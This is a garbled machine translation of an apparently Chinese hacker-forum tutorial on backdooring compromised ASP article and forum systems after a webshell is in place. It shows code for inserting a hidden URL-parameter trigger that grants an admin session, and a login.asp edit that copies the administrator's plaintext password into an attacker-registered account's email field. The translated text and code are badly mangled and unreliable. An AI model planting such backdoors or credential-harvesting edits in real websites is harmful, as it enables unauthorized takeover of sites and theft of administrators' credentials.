Author: aweige from: Chinese hackers Red Army
Subject to the disaster network forums Upload vulnerabilities and recently opened the upload vulnerabilities of various ASP systems exposed two-year-old ASP system, there may be many friends with a lot of Webshell broilers, as for the way of doing these chicks varies from person to person. Some people continue to enhance permission, further invasion, and some people just look at it, the horse has been in the past, there are some friends, when Webshell's freshness has passed the mystery and temptation of the background. In fact, for many powerful systems, I get a good back door, huh, huh, huh .......... But now a new version is a lot of ASP system passwords. MD5 encryption then cooperates with a strict verification program to verify, but will we do not break through these limitations? NO! I have to say how to break through these restrictions, let us go straight, there is a good thing, Follow Me ............ session spoofings first briefly talk about the general ASP system Authentication principle. In general, the background administrator enters the account password in the login page, and the program will look for the user's name password to the database. If you have this person's account password, you think you are an administrator, then give You a session value that represents your identity. Or the program first extract your username password, then remove the administrator's account password in the database's administrator table to compare the comparison you submitted. If it is equal, give you the SESION value indicating your identity. . Then you enter any of the management page, you must first verify your session value. If you are an administrator, let you pass, if you guide you back to the login page or some Qiqi warning, these are with the programmer Personal preferences are related. I know the principle, our current idea is to modify its procedure through our ASP Trojan and get a administrator session, so that we don't have administrator passwords, but we have never blocked in the background. I called this method as session spoof. It is limited to the space that can not be described in detail in each system. This article is only described as an example of a dynamic article system. Power Article System 3.51, (Figure 1)
Figure 1 All versions of the dynamic article system are all kills, including easy. Everyone can practice itself. Let's take a look at its verification content. Power Article 3.51 Verification page in admin_chklogin.asp, its verification content is as follows: ............ Elsers ("LastLoginip" = Request.ServerVariables ("remote_addr") RS ("LastLogintime") = Now () rs ("logintimes") = rs ("logintimes") 1 rs.Update session.timeout = sessionTimeout session ("adminName") = rs ("username" rs.close set = Nothing call closeconn () Response.Redirect "admin_index.asp" The message number is not verified by the username password, until Else, look, if the username password is correct to give you two session values: session.timeout = sessionTimeoutSession ("adminName) = rs ("Username") Let's take a look at how other management pages verify sessions, and initially this: It seems to be very strict, but let's take a look, it verifies an adminName's session, as long as our session The content is not adminName, can you pass? Ok, let's start, first go to get its administrator account, don't you teach you? You can know if you go to his website or download it directly. Let's find a page to change it, I am looking for a more no one, the content of the page Friendsite.asp (friendli link page) is changed, huh, so the administrator is hard to find out. Use the ASP Trojan's editing function to edit its content. Add a few words under his page: DIM IDID = TRIM (Request ("QWE")) IF ID = "120" THENSSION ("adminName") = "admin" 'This is assumed, actual operation You can change to the administrator account end if I simply say this sentence, that is, get the value of HEHE from the address bar. If hehe = 120, then the system gives us a value of admin. SESSION. Ok, let's enter a look, Figure 2:
Did you see what is abnormal? Or normal page, but we will then enter its background management homepage in the address bar, isn't it? Figure 3:
Figure ZHHHHHHHHHHU, don't do bad things ............ Summary: Let's get the administrator account, then find its verification page, write us according to its verification content to we want back door. Different systems have different verification methods, such as Qingchuang article system, it is not only to verify your username, but our overall thinking is still the same, that is what he has verified. The password can say that the above method is pale in front of the mobile network forum or other forum, because the general forum is much stronger than interactive, so it takes a lot of verification. Take the mobile network as an example, you have to log in to the background, he first verifies that you have first logged in the front desk, and if you don't return, you will return a false page. After you log in to the front desk, the system will give you a session to record your cachename and your ID, then take it out when you log in to the background, compare if your front and back is consistent, and you will pass, otherwise you will face this strict verification. Is there any way we have a way for the basement? Yes, no (who takes me to throw me? This wasted.), But we can think about new ways, since verification is so strict, then if I take the password light and big? Therefore, a new idea here is to get its plain text password. When is there a plain text password? Yes, it is when the administrator is logged in. Ok, we are there to do your hands, send us the password it logged in, then we will log in with your password. Oh, isn't it very like Sniffer? In the first few months, just a few months, the brothers, the Qi Dynasty, in the wild, hardware Sniffer, with the provincial network security, the person who took the provincial website, the foot 4000g hard drive, dozens of servers, one word: cool, we start Modify its program. Edit Login.asp, add the following sentence: if not isnull (TRIM ("UserName"))) Thenif Request ("UserName") = "admin" Tensql = "Update [DV_VSER] set useMail = (Select Userpassword from [DV_USER] Where username = '"" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" The actual operation is changed to your administrator name) Login successfully updated the database, put his password into the e-mail of our information. Of course, you must first register a username in the forum. The result is shown in Figure 4: Figure 4 is also, if it is a default database admin table name and 7.0 or more, it is not available in actual operation. Postscript: For the above two methods, I still can't think of any more effective solutions, because your website is put on the horse, you don't have a way to stop people from inserting, if you have a good solution Remember to tell me. QQ: 289509785 In addition, I hope everyone should not go to destruction. At that time, I really didn't want to see, and I wish all the network managers good luck, I hope you will not meet Craker.
